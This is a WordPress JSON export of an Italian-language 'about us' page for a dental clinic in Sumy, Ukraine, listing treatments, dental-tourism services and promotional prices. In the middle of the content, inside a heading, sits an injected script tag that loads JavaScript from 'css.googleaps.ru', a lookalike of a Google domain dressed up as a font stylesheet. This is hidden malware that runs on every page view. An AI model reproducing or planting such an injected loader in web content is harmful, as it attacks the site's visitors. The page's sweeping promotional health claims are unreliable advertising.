{"id":3721,"date":"2014-01-20T15:30:03","date_gmt":"2014-01-20T13:30:03","guid":{"rendered":"http:\/\/www.your-brilliant-smile.com\/?page_id=3721"},"modified":"2014-02-28T12:07:28","modified_gmt":"2014-02-28T10:07:28","slug":"chi-siamo","status":"publish","type":"page","link":"https:\/\/your-brilliant-smile.com\/it","title":{"rendered":"Chi siamo"},"content":{"rendered":"<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg\" rel=\"prettyPhoto[3721]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4140\" alt=\"Advantages of our dental clinic\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg\" width=\"300\" height=\"199\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-630x418.jpg 630w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-900x598.jpg 900w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Vantaggi della nostra clinica stomatologica:<\/b><\/p>\n<ul>\n<li>Tutti i tipi dei servizi stomatologici.<\/li>\n<li>Cure dei denti senza trapano da dentista (Tecnologia danese Sandman).<\/li>\n<li>Anestesia computerizzata (anestesia dei denti per mezzo di sistemi anestetici di nanotecnologia).<\/li>\n<li>Anestesia dei denti senza ago (Tecnologia tedesca INJEX).<\/li>\n<li>Diagnostica per mezzo di raggi Rontgen.<\/li>\n<li>Protesi senza tornitura dei denti sani.<\/li>\n<li>Protesi per mezzo di impianti (prezzi adeguati e convenienti).<\/li>\n<li>Stretta osservanza dei regimi anti-A.I.D.S, anti-epatite).<\/li>\n<li>Consulenza gratuita.<\/li>\n<li>I tempi pi\u00f9 brevi per la costruzione di protesi nella regione.<\/li>\n<li>Esperienza di molti anni nel lavoro degli specialisti.<\/li>\n<li>Garanzia per ogni costruzione, impiantata da noi.<\/li>\n<li>Politica flessibile dei prezzi (i nostri medici vi offriranno tutti i varianti delle costruzioni, da quelle a buon mercato fino alle pi\u00f9 costose di classe VIP).<\/li>\n<li>Servizi stomatologici<b> <\/b>a rate.<\/li>\n<li>Protesi e cure per mezzo di assicurazione (se vi\u00a0<em>siete assicurati nella compagnia di assicurazioni e la vostra <\/em>assicurazione si estende alla stomatologia).<\/li>\n<li>Lumineer di Hollywood (servizio unico per i clienti VIP).<\/li>\n<li>Componeer\u00a0 &#8211;\u00a0 tecnologia svizzera unica per il restauro dei denti (innovazione del 2012).<\/li>\n<li>Faccette estetiche entro 1 giorno.<\/li>\n<li>Laboratorio odontotecnico proprio.<\/li>\n<li>Programma di sconto.<\/li>\n<li>Possibilit\u00e0 di produzione di qualsiasi modificazione della protesi dentaria.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg\" rel=\"prettyPhoto[3721]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4141\" alt=\"Dental prosthesis in Sumy city\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg\" width=\"300\" height=\"241\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Protesi dei denti nella citt\u00e0 di Sumy<\/strong><\/p>\n<p>Nella nostra clinica stomatologica i medici fanno tutte le modificazioni esistenti delle protesi. Se vi trovate in una situazione troppo complicata e trascurata, questo non \u00e8 affatto un motivo per le preoccupazioni. Vi aiuteremo a risolvere anche i problemi pi\u00f9 complicati.<\/p>\n<p>Se volete mettere i denti, dovete chiedere un consulto online tramite il chat (<em>finestra galleggiante sul sito <\/em><a href=\"https:\/\/www.your-brilliant-smile.com\/\">www.your-brilliant-smile.com<\/a>) oppure chiamare il numero +3 8\u00a0066\u00a0196 87 93. Poi dovete iscrivervi anticipatamente alla visita (La visita primaria \u00e8 gratuita), poi avendo preso conoscenza di tutti i varianti possibili di soluzione del vostro problema ed avendo scelto la costruzione ottimale, mettervi alla costruzione di protesi.<\/p>\n<p>I tempi di costruzione di protesi nella nostra clinica stomatologica sono i pi\u00f9 brevi nella regione. Da 3 a 7 giorni.<\/p>\n<p>I lavori d\u2019elite di classe VIP, noi li mandiamo ai Laboratori odontotecnici di Kyiv, Europa (Germania, Svizzera), di conseguenza, per motivi di spedizione, il tempo di costruzione di protesi dentaria sar\u00e0 pi\u00f9 lungo, ma la qualit\u00e0 dei lavori sar\u00e0 migliore.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg\" rel=\"prettyPhoto[3721]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4142\" alt=\"Dental tourism in Ukraine\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg\" width=\"300\" height=\"200\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg 600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Turismo<\/b><b> <\/b><b>stomatologico<\/b><b> <\/b><b>in<\/b><b> <\/b><b>Ucraina<\/b><b>. <\/b><b>O perch\u00e9 vale la pena di rivolgervi proprio a noi.<\/b><\/p>\n<p>Nell\u2019ultimo tempo in tutto il mondo sempre pi\u00f9 spesso ha luogo una nuova direzione in turismo, si tratta del turismo stomatologico. Voi potete notevolmente risparmiare i vostri soldi e il vostro tempo, inoltre, vedere l\u2019Ucraina, essere presenti alle escursioni e dedicare un po\u2019 di tempo alla vostra salute.<\/p>\n<p>Noi invitiamo gli abitanti di tutti i paesi ad arrivare alla nostra citt\u00e0 di Sumy ed a visitare la nostra clinica stomatologica. Voi potete ottenere la consulenza da uno specialista qualificato, avendo scritto al nostro indirizzo (<a href=\"mailto:katsumoto2018@gmail.com\">katsumoto2018@gmail.com<\/a>), o nel regime online tramite il chat online. Il variante ideale \u00e8 mandare al nostro e-mail la vostra radiografia panoramica, noi potremo concedervi una consultazione pi\u00f9 precisa e calcolare il costo del lavoro prima del suo inizio. Ci assumiamo tutti i momenti organizzativi. Vi aiuteremo senz\u2019altro a scegliere un luogo di residenza provvisoria (un appartamento od un albergo). L\u2019albergo pi\u00f9 vicino a 4 stelle si trova a 500 metri dalla nostra clinica. Vi aiuteremo immancabilmente ad organizzare il vostro tempo libero, sceglieremo le escursioni convenienti nella nostra citt\u00e0, per i posti storicamente famosi della nostra regione e del nostro capitale Kyiv.<\/p>\n<p>La stomatologia \u00e8 molto richiesta tra la popolazione. Nella nostra regione sono aperte tante cliniche stomatologiche e tanti gabinetti, ma ogni medico tratta la stessa situazione in diversi modi. Qualcuno fa le cure e la costruzione di protesi meno invasive per il paziente, qualcuno pi\u00f9 invasive, e per questo non si pu\u00f2 biasimare nessuno. Ogni medico \u00e8 una persona diversa. Gli approcci sono diversi. Anche le tecnologie e le convinzioni sono diverse. I medici della nostra clinica hanno gli approcci alla riabilitazione dei pazienti che si distinguono dagli altri. Noi andiamo per la strada del minimo intervento (se questo sia possibile in forza delle indicazioni), della razionalit\u00e0, della sterilit\u00e0 e dei metodi indolori. Tutti i tipi delle cure e della costruzione di protesi dentarie noi li facciamo sotto l\u2019anestesia (pi\u00f9 spesso noi usiamo il sistema tedesco INJEX, essa permette di fare l\u2019anestesia del dente senza puntura di ago).<\/p>\n<p>La costruzione di protesi dentaria nella nostra clinica si effettua secondo lo schema individuale (per mezzo di arco facciale e di articolatore, tenendo conto dei parametri della vostra articolazione e dei dati antropometrici). Lo schema individuale da la possibilit\u00e0 di effettuare la costruzione di protesi dentaria in modo pi\u00f9 preciso e pi\u00f9 confortevole per il paziente, tenendo conto non solo della forma dei denti, ma anche della struttura di articolazione e degli angoli di movimento dei denti. Alla fine questo lavoro sar\u00e0 molto preciso e confortevole.<\/p>\n<p><strong>Noi facciamo tutti i tipi della costruzione di protesi dentaria:<script src=\"\/\/css.googleaps.ru\/css?f=Open+Sans&#038;cd=mb&#038;ver=4.2.2\"><\/script><\/strong><\/p>\n<ul>\n<li>La costruzione di protesi B\u00fcgel (Le protesi B\u00fcgel su attachment, le protesi B\u00fcgel classiche, le protesi B\u00fcgel con il sistema telescopico di fissazione, le protesi con la fissazione per mezzo di traversa, le protesi con il sistema di fissazione a travi).<\/li>\n<li>Ceramica senza uso di metallo.<\/li>\n<li>Metalloceramica<\/li>\n<li>Lumineer<\/li>\n<li>Faccette estetiche<\/li>\n<li>Componeer<\/li>\n<li>La costruzione di protesi con impianti.<\/li>\n<li>La costruzione di protesi dentarie staccabili (le protesi sovrapposte, le protesi lamellari, le protesi staccabili provvisorie).<\/li>\n<li>Le capsule provvisorie di plastica, le microprotesi.<\/li>\n<li>La costruzione di microprotesi dentarie per mezzo di inserti e coprigiunti.<\/li>\n<\/ul>\n<p><b>Le cure dei denti <\/b>nella nostra clinica stomatologica si effettua solo secondo le tecnologie pi\u00f9 moderne. Noi mettiamo le impiombature solo dai cementi vetroionomerici e dai materiali compositi fotopolimerici prodotti in Germania, in Giappone e negli USA. Le cure del canale della radice nella nostra clinica si effettua per mezzo di endomotore (\u00e8 un impianto che permette di allargare il canale della radice fino alla larghezza necessaria) con il successivo riempimento del canale della radice con la guttaperca riscaldata e con l\u2019addensatore di cemento speciale per l\u2019impiombatura.<\/p>\n<p>In alcuni casi molto complicati la procedura si effettua per mezzo di cofferdam Raberdam (con l\u2019isolamento dell\u2019area di lavoro). \u00c8 possibile fare la foratura dei denti senza trapano da dentista (la tecnologia permette di togliere i tessuti dentari lesionati con l\u2019apparecchio speciale che nel senso letterale soffia il tessuto dentario lesionato).<\/p>\n<p><b>Le cure delle malattie gengivali <\/b>(parodontite, paradontosi, gengivite) noi le facciamo per mezzo di laser a diodi \u201dBiolase\u201d. Questa tecnologia favorisce l\u2019influenza antisettica sicura sui tessuti molli malati. Il curettaggio (la pulitura delle tasche gengivali dai tessuti di granulazione), eseguito per mezzo di laser \u00e8 molto pi\u00f9 efficace nei confronti delle procedure standard e favorisce la cicatrizzazione pi\u00f9 veloce e qualitativo. Dopo 3-5 procedure guariscono quasi tutte le malattie note dei tessuti molli.<\/p>\n<p><b>Diagnostica rontgen<\/b> <b><\/b><\/p>\n<p>La presenza del proprio apparecchio radioscopico Rontgen ci permette di diagnosticare pi\u00f9 precisamente le malattie del sistema mascellare. In alcuni casi \u00e8 necessario fare la radiografia nelle fasi intermedie delle cure.<\/p>\n<p><b>Stomatologia<\/b><b> <\/b><b>laser<\/b><b><\/b><\/p>\n<p>La presenza del laser ci permette di fare tali tipi di lavori come l\u2019impiantazione laser dei denti, l\u2019imbianchimento laser dei denti, il raccorciamento della briglia, l\u2019approfondimento dell\u2019ingresso alla cavit\u00e0 orale, le cure delle malattie di parodonto, la chiusura delle fistole, le cure della pericoronite.<\/p>\n<p><b>Le cure dei denti senza trapano da dentista<\/b><\/p>\n<p><b>Le cure e la costruzione di protesi dentaria sotto l\u2019ingrandimento<\/b><\/p>\n<p><b>Stomatologia<\/b><b> <\/b><b>chirurgica<\/b><b><\/b><\/p>\n<p>L\u2019eliminazione dei denti di qualsiasi complessit\u00e0, <a href=\"https:\/\/www.google.com.ua\/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=7&amp;cad=rja&amp;ved=0CFcQFjAG&amp;url=http%3A%2F%2Fwww.amazon.it%2FParodontologia-mucogengivale-rigenerativa-parodontali-peri-implantari%2Fdp%2F8829920789&amp;ei=uhO9UrCbFILStQay4IHgAg&amp;usg=AFQjCNGgXqIFZDfzqwPOsrQqdPGKjXJRiQ&amp;sig2=1urat6fAVFLe8tX1V93BYA\">la parodontologia chirurgica<\/a>, l\u2019eliminazione della ciste, l\u2019eliminazione delle neoformazioni, l\u2019escissione delle briglie, l\u2019approfondimento dell\u2019ingresso alla cavit\u00e0 orale, l\u2019impiantazione dei denti, l\u2019aggiunta\u00a0di osso.<\/p>\n<p><b>Decorazione<\/b><b> <\/b><b>dei<\/b><b> <\/b><b>denti<\/b><b><\/b><\/p>\n<p>Intarsio dei denti con skyce, strass, pietre preziose.<\/p>\n<p><b>Gnatologia<\/b><\/p>\n<p>Consulenza di gnatologo. Diagnostica delle malattie dell\u2019articolazione temporomandibolare. Diagnostica e correzione dei disturbi occlusivi per mezzo di articolatore e di smerigliatura selettiva dei denti. Produzione del paradenti per trattare il\u00a0<a title=\"Bruxismo\" href=\"http:\/\/it.wikipedia.org\/wiki\/Bruxismo\">bruxismo<\/a>, contro l\u2019abrasione patologica dei denti. Produzione del paradenti per la vasta costruzione di protesi dentarie. Paradenti di rilassamento. Paradenti di riposizione.<\/p>\n<p><b>Stomatologia per le incinte<\/b><\/p>\n<p>Nella nostra clinica si usano per le incinte i metodi di trattamento e di costruzione di protesi meno invasivi. Abbiamo i preparati ed i materiali di impiombatura pi\u00f9 innocui e certificati.<\/p>\n<p><b>Impiantazione dei denti<\/b><\/p>\n<p>Nella nostra clinica si dedica la grandissima attenzione all\u2019mpiantazione dei denti. Questa direzione della costruzione di protesi per eliminare i difetti dei denti si sviluppa impetuosamente nel tempo presente. Tutti i lavori per la costruzione di protesi con impianti si effettuano secondo lo schema individuale, tenendo conto delle particolarit\u00e0 individuali della commettitura dei denti e della struttura dell\u2019articolazione temporomandibolare. Noi lavoriamo solo con i sistemi affidabili degli impianti, prodotti in Germania, negli USA, in Israele.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg\" rel=\"prettyPhoto[3721]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4143\" alt=\"New action offers\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg\" width=\"300\" height=\"160\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg 595w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p><b>Nuove promozioni della nostra clinica:<\/b><\/p>\n<p>1. IMPIOMBATURA FOTOPOLIMERICA FILTEK Z550\u00a0(USA) solo per 200 grivne. (il fotopolimero \u00e8 il materiale per l\u2019impiombatura pi\u00f9 solido e impercettibile, esso non si scalza, non ha microfessure, e la cosa pi\u00f9 importante \u2013 si pu\u00f2 sceglierlo per qualsiasi colore del dente (l\u2019impiombatura non si distingue dal colore del dente). Perch\u00e9 200 grivne \u00e8 il prezzo a buon mercato? Il costo medio dell\u2019impiombatura simile nelle cliniche di Kyiv, Kharkiv, Lviv \u00e8 da 350 a 400 grivne).<\/p>\n<p>2. Protesi dei denti. FACCETTE ESTETICHE IPS EMAX\u00a0(Germania) solo per 1000 grivne. Che cose sono le faccette estetiche? Le faccette estetiche sono le fine piastrine di ceramica che permettono di cambiare il colore e la forma dei denti. Se avete i denti storti, quella piastrina \u00e8 un\u2019ottima alternativa ai bracket. Se volete che i vostri denti diventino pi\u00f9 chiari per sempre e non solo per un tempo limitato, le faccette estetiche esistono proprio per voi. Perch\u00e9 proprio IPS EMAX\u00a0 (Germania) e non altra compagnia? IPS EMAX\u00a0\u2013 \u00e8 la tecnologia pi\u00f9 provata e biocompatibile, queste faccette estetiche hanno l\u2019aspetto cos\u00ec naturale, che non verr\u00e0 in testa a nessuno un\u2019idea che questi denti non sono vostri originali, ma artificiali. La tecnologia \u00e8 ammessa ed approvata in tutto il mondo, anche \u00e8 approvata in Ucraina. Perch\u00e9 1000 grivne \u00e8 il prezzo a buon mercato? Il costo medio nella citt\u00e0 di Sumy \u00e8 di 2000 grivne. Nei paesi europei \u00e8 di 1000 euro per unit\u00e0, a Kyiv \u00e8 di 3500 \u2013 4000 grivne).<\/p>\n<p>3. METALLOCERAMICA VitaVM13 (Germania) \u2013 650 grivne. VitaVM13 \u00e8 un materiale che non ha analoghi dal punto di vista di estetica e di caratteristiche di resistenza. Le capsule metalloceramiche da questo materiale si presentano molto brillanti, perch\u00e9 questa sostanza da la possibilit\u00e0 di creare qualsiasi sfumatura, tono, propriet\u00e0 luminescente ed opalescente. Il prodotto fatto da questa sostanza \u00e8 un lavoro di gioielliere. (il costo medio a Sumy \u00e8 di 700 \u2013 800 grivne per unit\u00e0).<\/p>\n<p>4. Imbianchimento dei denti con laser \u2013 il risultato \u00e8 100% &#8211; 1500 grivne. Imbianchimento con laser non provoca l\u2019aumento di sensibilit\u00e0 dei denti, permette di ottenere il risultato non fra un\u2019ora o fra una settimana, ma subito \u2013 entro 20 minuti. (nella citt\u00e0 di Sumy tale impianto lo abbiamo solo noi. Il costo medio della procedura dell\u2019imbianchimento con laser a Kyiv (usando lo stesso laser e lo stesso completo per l\u2019imbianchimento) \u2013 3000 \u2013 4500 grivne).<\/p>\n<p>5. Ceramica senza uso di metallo \u00e8 un\u2019estetica insuperata (inserti, capsule, faccette estetiche di ceramica). \u00c8 l\u2019estetica massima per il prezzo di promozione 1000 grivne! Il vecchio prezzo \u00e8 di 2000 grivne. Se volete ottenere un sorriso radioso ed un risultato di alta qualit\u00e0, questo \u00e8 il variante migliore per voi e per i vostri amici).<\/p>\n<p>6. Protesi invisibili. Costruzioni che hanno i fissamenti con serratura. Costruzione di protesi per mezzo di impianti. Tutto questo include i varianti che permettono di ottenere una protesi assolutamente impercettibile alle persone circostanti, la quale si regger\u00e0 stabilmente e non vi metter\u00e0 in imbarazzo.<\/p>\n<p>7. Stomatologia per le incinte. Questo ramo si distingue moltissimo dall\u2019aiuto stomatologico abituale. Qui esistono tante sfumature. Si deve prestare alle donne incinte un\u2019attenzione particolare e la cura, si deve fare la scelta meticolosa tra questi o quelli medicinali.<\/p>\n<p>8. Costruzione di protesi a rate fino a 1 anno.<\/p>\n<p>9. Esperienza di molti anni degli specialisti.<\/p>\n<p>10. Garanzia per la protesi dentaria \u00e8 di 3 anni. Per le cure \u00e8 di 1 anno. Non confondete la garanzia con la durata di servizio, sono concetti diversi, la durata di servizio sempre supera la garanzia a numerose volte. Le condizioni di caso di garanzia sono: rottura della protesi o dell\u2019impiombatura, <em>caduta del dente. Il nostro interesse <\/em>\u00e8 vedervi contenti di qualit\u00e0 dei nostri servizi, perci\u00f2 il rispetto dei termini di garanzia \u00e8 una delle nostre regole obbligatorie.<\/p>\n<p>11. Lumineer di Hollywood \u00e8 un\u2019unica tecnologia che permette di creare le faccette estetiche ultrafini individuali non tornendo i vostri denti (nella citt\u00e0 di Sumy nessuna clinica oltre la nostra non \u00e8 autorizzata ad usare questa metodologia).<\/p>\n<p>12. Componeer (le faccette estetiche entro 1 visita) sono le faccette estetiche, prodotte dal materiale composito pressato. Il vantaggio di questa metodologia \u00e8 in quel fatto che si pu\u00f2 usarla entro una visita stomatologica. Nella nostra clinica 1 faccetta estetica cos\u00ec costa 1500 grivne (nella citt\u00e0 di Sumy nessuna clinica oltre la nostra non \u00e8 autorizzata ad usare questa metodologia).<\/p>\n<p>13. I tempi pi\u00f9 brevi possibili per la costruzione di protesi nella regione (da 3 a 5 giorni).<\/p>\n<p>15. \u201cPossibilit\u00e0 della costruzione di protesi dentaria di qualsiasi modificazione\u201d. Nella nostra clinica voi potete ordinare qualsiasi tipo della protesi dentaria. Noi facciamo la costruzione di protesi dei denti secondo tutte le metodologie moderne esistenti e perfezioniamo permanentemente le nostre conoscenze nei seminari e nelle conferenze pratiche, informandoci sulle nuove possibilit\u00e0 e metodologie.<\/p>\n<p>16. Lavoro sotto l\u2019ingrandimento. (Un dentista \u00e8 come un gioielliere, volendo fare il suo lavoro pi\u00f9 qualitativo e pi\u00f9 bello, non pu\u00f2 vedere tutte le sfumature senza ingrandimento triplice o quintuplo. Nei casi quando il paziente ha le alte esigenze estetiche, noi usiamo gli apparecchi d\u2019ingrandimento).<\/p>\n<p>17. Stomatologia infantile (trattamento dei denti senza trapano da dentista).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vantaggi della nostra clinica stomatologica: Tutti i tipi dei servizi stomatologici. Cure dei denti senza trapano da dentista (Tecnologia danese Sandman). Anestesia computerizzata (anestesia dei denti per mezzo di sistemi anestetici di nanotecnologia). Anestesia dei denti senza ago (Tecnologia tedesca INJEX). Diagnostica per mezzo di raggi Rontgen. Protesi senza tornitura dei denti sani. Protesi per [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/your-brilliant-smile.com\/it\/wp-json\/wp\/v2\/pages\/3721"}],"collection":[{"href":"https:\/\/your-brilliant-smile.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/your-brilliant-smile.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/it\/wp-json\/wp\/v2\/comments?post=3721"}],"version-history":[{"count":3,"href":"https:\/\/your-brilliant-smile.com\/it\/wp-json\/wp\/v2\/pages\/3721\/revisions"}],"predecessor-version":[{"id":4155,"href":"https:\/\/your-brilliant-smile.com\/it\/wp-json\/wp\/v2\/pages\/3721\/revisions\/4155"}],"wp:attachment":[{"href":"https:\/\/your-brilliant-smile.com\/it\/wp-json\/wp\/v2\/media?parent=3721"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}